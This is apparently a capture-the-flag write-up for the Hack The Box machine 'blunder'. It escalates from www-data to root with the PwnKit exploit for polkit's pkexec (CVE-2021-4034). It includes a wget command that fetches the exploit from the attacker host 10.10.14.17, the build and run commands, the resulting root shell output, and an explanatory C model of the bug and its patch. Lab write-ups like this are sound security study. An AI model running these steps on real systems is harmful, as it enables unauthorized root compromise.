CVE-2021-4034
Earlier, PEAS discovered that the target system is vulnerable to CVE-2021-4034
A vulnerability classified as critical has been found in polkit (affected version not known from the scan output). The issue lies in the argument handling of the setuid-root binary /usr/bin/pkexec: when pkexec is executed with an empty argument list (argc == 0), it reads and writes past the end of argv into the environment, which lets any local user inject an environment variable and obtain root. CWE-284 (Improper Access Control) is used to classify the problem: the software does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. Confidentiality, integrity, and availability are all impacted.
Exploit (PwnKit)
Exploit found online
Since compilers are installed on the target system, I can compile the exploit on the target itself instead of cross-compiling on Kali.
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ git clone https://github.com/berdav/CVE-2021-4034.git ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 1.89 MiB/s, done.
Resolving deltas: 100% (44/44), done.
Exploit repository cloned on Kali and packed into a tarball for transfer
Exploitation
www-data@blunder:/dev/shm$ wget -q http://10.10.14.17/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
Delivered to /dev/shm over HTTP from the Kali host and extracted
www-data@blunder:/dev/shm/CVE-2021-4034$ make
make: Warning: File 'Makefile' has modification time 20295 s in the future
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
make: warning: Clock skew detected. Your build may be incomplete.
Compiled. The warnings are only clock skew: the tarball was created on Kali, whose clock is ahead of the target's, so the extracted files carry timestamps in the future. The build still produced pwnkit.so, the cve-2021-4034 launcher, the gconv-modules file, and the GCONV_PATH=. directory holding a copy of /usr/bin/true named pwnkit.so:.
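To make sense of the odd file names the build produced, the following is an added example (not code from the page or from the berdav repository) that models the root cause of CVE-2021-4034 in plain user space. On Linux the kernel lays out argv[0..argc-1], a terminating NULL, and then envp[0..] as one contiguous pointer array, so a process started with an empty argv (execve(path, {NULL}, envp)) has argc == 0 and its argv[1] aliases envp[0]. pkexec's option loop started at n = 1, read argv[n], resolved it through PATH and wrote the result back into argv[n], i.e. into the environment. With envp[0] = "pwnkit.so:." and PATH = "GCONV_PATH=.", the write-back turns envp[0] into "GCONV_PATH=./pwnkit.so:.", which is why the Makefile creates exactly that directory and file. The PATH search is simulated by string concatenation (assumption: the file exists); the "patched" flag adds the upstream argc < 1 check.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_MAX 16

/* Simulated g_find_program_in_path(): "<first PATH entry>/<name>".
   Assumption for the model only: the file exists in that directory. */
static char *fake_find_in_path(const char *name, const char *path_env) {
    static char out[256];
    size_t dirlen = strcspn(path_env, ":");
    snprintf(out, sizeof out, "%.*s/%s", (int)dirlen, path_env, name);
    return out;
}

/* Minimal getenv() over an explicit envp block. */
static const char *env_lookup(char **envp, const char *key) {
    size_t klen = strlen(key);
    for (int i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], key, klen) == 0 && envp[i][klen] == '=')
            return envp[i] + klen + 1;
    return NULL;
}

/* Model of pkexec's argument handling. Returns the program it would go on
   to execute, or NULL if it refuses. patched != 0 adds the upstream fix,
   which exits immediately when argc < 1. */
const char *pkexec_pick_program(int argc, char **argv, int patched) {
    if (patched && argc < 1)
        return NULL;                       /* upstream fix: exit(127) */
    int n;
    for (n = 1; n < argc; n++) {           /* body never runs if argc == 0 */
        if (strncmp(argv[n], "--", 2) == 0) continue; /* skip options (simplified) */
        break;
    }
    const char *path = argv[n];            /* argc == 0: this is envp[0] */
    if (path == NULL)
        return NULL;
    if (path[0] != '/') {
        char **envp = argv + argc + 1;     /* where the kernel placed envp */
        const char *p = env_lookup(envp, "PATH");
        if (p == NULL)
            return NULL;
        char *resolved = fake_find_in_path(path, p);
        argv[n] = resolved;                /* argc == 0: overwrites envp[0] */
        path = resolved;
    }
    return path;
}

/* Attacker layout from the exploit: argc = 0, envp[0] = "pwnkit.so:.",
   PATH = "GCONV_PATH=." (constructed to match the Makefile's artifacts).
   Returns the GCONV_PATH value visible after pkexec's write-back, or NULL. */
const char *demo_injected_gconv_path(int patched) {
    static char *block[BLOCK_MAX];
    char **argv = block;
    argv[0] = NULL;                        /* argc == 0: argv ends at once */
    char **envp = block + 1;
    envp[0] = "pwnkit.so:.";
    envp[1] = "PATH=GCONV_PATH=.";
    envp[2] = "CHARSET=PWNKIT";
    envp[3] = NULL;
    (void)pkexec_pick_program(0, argv, patched);
    return env_lookup(envp, "GCONV_PATH"); /* vulnerable: "./pwnkit.so:." */
}

/* Normal invocation for contrast: pkexec id, with PATH=/usr/bin. */
const char *demo_normal_invocation(int patched) {
    static char *block[BLOCK_MAX];
    block[0] = "pkexec"; block[1] = "id"; block[2] = NULL;
    block[3] = "PATH=/usr/bin"; block[4] = NULL;
    return pkexec_pick_program(2, block, patched);
}

int main(void) {
    const char *g = demo_injected_gconv_path(0);
    printf("vulnerable, argc=0: GCONV_PATH=%s\n", g ? g : "(unset)");
    g = demo_injected_gconv_path(1);
    printf("patched,    argc=0: GCONV_PATH=%s\n", g ? g : "(unset)");
    printf("normal:             %s\n", demo_normal_invocation(1));
    return 0;
}
```

Once GCONV_PATH points at the attacker's directory, the remaining steps in the real exploit are glib's: an invalid SHELL makes pkexec print an error, the message is converted to the charset named by CHARSET=PWNKIT, the gconv-modules file in that directory maps PWNKIT to the "pwnkit" module, and pwnkit.so is loaded as root. The patched path never reaches any of that because it refuses the empty argument list up front.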
www-data@blunder:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
blunder
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.191 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:30a prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:30a prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:03:0a txqueuelen 1000 (Ethernet)
RX packets 4719451 bytes 412719361 (412.7 MB)
RX errors 0 dropped 199 overruns 0 frame 0
TX packets 3615333 bytes 2490262493 (2.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 27507 bytes 2420793 (2.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 27507 bytes 2420793 (2.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise